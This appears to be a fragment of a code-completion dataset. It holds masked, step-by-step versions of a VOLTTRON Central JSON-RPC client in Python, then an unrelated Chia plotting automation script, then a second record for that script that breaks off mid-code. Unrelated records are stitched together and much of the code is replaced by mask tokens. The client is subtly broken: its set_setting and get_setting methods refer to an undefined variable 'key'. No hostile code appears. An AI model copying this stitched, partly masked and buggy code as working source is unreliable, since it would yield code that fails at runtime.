"step-1": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n <mask token>\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n <mask token>\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n <mask token>\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n <mask token>\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization', username=self._username,\n password=self._password)\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc('set_setting', key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization', username=self._username,\n password=self._password)\n\n def register_instance(self, addr, name=None):\n \"\"\"\n Register a platform with Volttron Central\n\n :param addr: Platform's discovery address that will be registered\n \"\"\"\n return self.do_rpc('register_instance', discovery_address=addr,\n display_name=name)\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc('set_setting', key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-5": "# -*- coding: utf-8 -*- {{{\n# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:\n\n# Copyright (c) 2017, Battelle Memorial Institute\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# The views and conclusions contained in the software and documentation\n# are those of the authors and should not be interpreted as representing\n# official policies, either expressed or implied, of the FreeBSD\n# Project.\n#\n# This material was prepared as an account of work sponsored by an\n# agency of the United States Government. Neither the United States\n# Government nor the United States Department of Energy, nor Battelle,\n# nor any of their employees, nor any jurisdiction or organization that\n# has cooperated in the development of these materials, makes any\n# warranty, express or implied, or assumes any legal liability or\n# responsibility for the accuracy, completeness, or usefulness or any\n# information, apparatus, product, software, or process disclosed, or\n# represents that its use would not infringe privately owned rights.\n#\n# Reference herein to any specific commercial product, process, or\n# service by trade name, trademark, manufacturer, or otherwise does not\n# necessarily constitute or imply its endorsement, recommendation, or\n# favoring by the United States Government or any agency thereof, or\n# Battelle Memorial Institute. The views and opinions of authors\n# expressed herein do not necessarily state or reflect those of the\n# United States Government or any agency thereof.\n#\n# PACIFIC NORTHWEST NATIONAL LABORATORY\n# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY\n# under Contract DE-AC05-76RL01830\n\n# }}}\n\nimport requests\n\n\"\"\"\nThis example exposes the VOLTTRON web API\nthrough a python class that that does not depend\non VOLTTRON proper. A VOLTTRON Central Agent must\nbe running on the url passed to the constructor.\n\"\"\"\n\nclass VolttronWebRPC(object):\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {\n 'jsonrpc': '2.0',\n 'method': method,\n 'params': params,\n 'authorization': self._auth_token,\n 'id': '1'\n }\n\n r = requests.post(self._url, json=data)\n validate_response(r)\n\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization',\n username=self._username,\n password=self._password)\n\n def register_instance(self, addr, name=None):\n \"\"\"\n Register a platform with Volttron Central\n\n :param addr: Platform's discovery address that will be registered\n \"\"\"\n return self.do_rpc('register_instance',discovery_address=addr,\n display_name=name)\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type=\"json\"):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity,\n config_name=config_name,\n raw_contents=raw_contents,\n config_type=config_type)\n return self.do_rpc(\"store_agent_config\", **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity)\n return self.do_rpc(\"list_agent_configs\", **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity,\n config_name=config_name,\n raw=raw)\n return self.do_rpc(\"get_agent_config\", **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc(\"set_setting\", key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc(\"get_setting\", key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc(\"get_setting_keys\")\n\n\ndef validate_response(response):\n \"\"\"\n Validate that the message is a json-rpc response.\n\n :param response:\n :return:\n \"\"\"\n assert response.ok\n rpcdict = response.json()\n assert rpcdict['jsonrpc'] == '2.0'\n assert rpcdict['id']\n assert 'error' in rpcdict.keys() or 'result' in rpcdict.keys()\n",
"step-ids": [
11,
12,
14,
15,
18
]
}
|
[
11,
12,
14,
15,
18
] |
import os
import time
import uuid
import subprocess
# Global variables. ADJUST THEM TO YOUR NEEDS
chia_executable = os.path.expanduser('~')+"/chia-blockchain/venv/bin/chia" # directory of chia binary file
numberOfLogicalCores = 16 # number of logical cores that you want to use overall
run_loop_interval = 10 # seconds of delay before this algorithm executes another loop
refresh_logs_interval = 10 # seconds of delay before this algorithm will try to re-read all logs after adding plot
logs_location = os.path.expanduser('~')+"/.chia/mainnet/plotter/" # location of the log files. Remove all corrupted and interrupted log files!
string_contained_in_all_logs = ".txt" # shared part of the name of all the log files (all logfiles must have it!)
phase_one_finished = "Time for phase 1 =" # part of the log file that means 1/2 core should be freed
phase_four_finished = "Time for phase 4 =" # part of the log file that means 2/2 core should be freed
temporary_directory = "/srv/chia/plots/" # plotting final destination
final_directory = "/mnt/chia/plots/" # plotting directory
farmer_public_key = "8536d991e929298b79570ad16ee1150d3905121a44251eda3740f550fcb4285578a2a22448a406c5e73c2e9d77cd7eb2" # change to your key
pool_public_key = "907f125022f2b5bf75ea5ef1f108b0c9110931891a043f421837ba6edcaa976920c5b2c5ba8ffdfb00c0bd71e7b5a2b1" # change to your key
# Functions
def fetch_file_content(file_path):
if not os.path.isfile(file_path):
print('File does not exist.')
else:
with open(file_path) as file:
return file.readlines()
def fetch_logs():
item_in_location_list = os.listdir(logs_location)
content_path_list = list(map(lambda log: logs_location + log, item_in_location_list))
text_file_list = list(filter(lambda path: string_contained_in_all_logs in path, content_path_list))
logs_content = list(map(fetch_file_content, text_file_list))
return logs_content
def count_used_cores(logs):
print("===START COUNTING===")
used_cores_counter = 0
for (index, log) in enumerate(logs):
print(f"Starting log #{index}")
print("Potentially it's still in phase one assigning 4 cores")
used_cores_counter += 4
for line in log:
if phase_one_finished in line:
print("Phase one was finished in the log, deallocating two cores")
used_cores_counter -= 2
if phase_four_finished in line:
print("Phase four was finished in the log, deallocating two cores")
used_cores_counter -= 2
print(f"===FINISH COUNTING: {used_cores_counter} USED CORES===")
return used_cores_counter
def use_all_cores():
log_list = fetch_logs()
cores_used = count_used_cores(log_list)
while numberOfLogicalCores > cores_used +1:
print("There are four cores free, adding new plot!")
add_plot()
time.sleep(refresh_logs_interval)
log_list = fetch_logs()
cores_used = count_used_cores(log_list)
def add_plot():
command = f"{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &"
unique_filename = str(uuid.uuid4())
new_log_file_path = f"{logs_location}/{unique_filename}{string_contained_in_all_logs}"
with open(new_log_file_path, "w") as file:
subprocess.run(command, shell=True, stdout=file)
def run_loop():
while True:
use_all_cores()
time.sleep(run_loop_interval)
# Entry point
run_loop()
|
normal
|
{
"blob_id": "bc536440a8982d2d4a1bc5809c0d9bab5ac6553a",
"index": 2313,
"step-1": "<mask token>\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log,\n item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in\n path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print('===START COUNTING===')\n used_cores_counter = 0\n for index, log in enumerate(logs):\n print(f'Starting log #{index}')\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\n 'Phase one was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\n 'Phase four was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n print(f'===FINISH COUNTING: {used_cores_counter} USED CORES===')\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used + 1:\n print('There are four cores free, adding new plot!')\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\n<mask token>\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef fetch_file_content(file_path):\n if not os.path.isfile(file_path):\n print('File does not exist.')\n else:\n with open(file_path) as file:\n return file.readlines()\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log,\n item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in\n path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print('===START COUNTING===')\n used_cores_counter = 0\n for index, log in enumerate(logs):\n print(f'Starting log #{index}')\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\n 'Phase one was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\n 'Phase four was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n print(f'===FINISH COUNTING: {used_cores_counter} USED CORES===')\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used + 1:\n print('There are four cores free, adding new plot!')\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\ndef add_plot():\n command = (\n f'{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &'\n )\n unique_filename = str(uuid.uuid4())\n new_log_file_path = (\n f'{logs_location}/{unique_filename}{string_contained_in_all_logs}')\n with open(new_log_file_path, 'w') as file:\n subprocess.run(command, shell=True, stdout=file)\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\n<mask token>\n",
"step-3": "<mask token>\nchia_executable = os.path.expanduser('~') + '/chia-blockchain/venv/bin/chia'\nnumberOfLogicalCores = 16\nrun_loop_interval = 10\nrefresh_logs_interval = 10\nlogs_location = os.path.expanduser('~') + '/.chia/mainnet/plotter/'\nstring_contained_in_all_logs = '.txt'\nphase_one_finished = 'Time for phase 1 ='\nphase_four_finished = 'Time for phase 4 ='\ntemporary_directory = '/srv/chia/plots/'\nfinal_directory = '/mnt/chia/plots/'\nfarmer_public_key = (\n '8536d991e929298b79570ad16ee1150d3905121a44251eda3740f550fcb4285578a2a22448a406c5e73c2e9d77cd7eb2'\n )\npool_public_key = (\n '907f125022f2b5bf75ea5ef1f108b0c9110931891a043f421837ba6edcaa976920c5b2c5ba8ffdfb00c0bd71e7b5a2b1'\n )\n\n\ndef fetch_file_content(file_path):\n if not os.path.isfile(file_path):\n print('File does not exist.')\n else:\n with open(file_path) as file:\n return file.readlines()\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log,\n item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in\n path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print('===START COUNTING===')\n used_cores_counter = 0\n for index, log in enumerate(logs):\n print(f'Starting log #{index}')\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\n 'Phase one was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\n 'Phase four was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n print(f'===FINISH COUNTING: {used_cores_counter} USED CORES===')\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used + 1:\n print('There are four cores free, adding new plot!')\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\ndef add_plot():\n command = (\n f'{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &'\n )\n unique_filename = str(uuid.uuid4())\n new_log_file_path = (\n f'{logs_location}/{unique_filename}{string_contained_in_all_logs}')\n with open(new_log_file_path, 'w') as file:\n subprocess.run(command, shell=True, stdout=file)\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\nrun_loop()\n",
"step-4": "import os\nimport time\nimport uuid\nimport subprocess\nchia_executable = os.path.expanduser('~') + '/chia-blockchain/venv/bin/chia'\nnumberOfLogicalCores = 16\nrun_loop_interval = 10\nrefresh_logs_interval = 10\nlogs_location = os.path.expanduser('~') + '/.chia/mainnet/plotter/'\nstring_contained_in_all_logs = '.txt'\nphase_one_finished = 'Time for phase 1 ='\nphase_four_finished = 'Time for phase 4 ='\ntemporary_directory = '/srv/chia/plots/'\nfinal_directory = '/mnt/chia/plots/'\nfarmer_public_key = (\n '8536d991e929298b79570ad16ee1150d3905121a44251eda3740f550fcb4285578a2a22448a406c5e73c2e9d77cd7eb2'\n )\npool_public_key = (\n '907f125022f2b5bf75ea5ef1f108b0c9110931891a043f421837ba6edcaa976920c5b2c5ba8ffdfb00c0bd71e7b5a2b1'\n )\n\n\ndef fetch_file_content(file_path):\n if not os.path.isfile(file_path):\n print('File does not exist.')\n else:\n with open(file_path) as file:\n return file.readlines()\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log,\n item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in\n path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print('===START COUNTING===')\n used_cores_counter = 0\n for index, log in enumerate(logs):\n print(f'Starting log #{index}')\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\n 'Phase one was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\n 'Phase four was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n print(f'===FINISH COUNTING: {used_cores_counter} USED CORES===')\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = 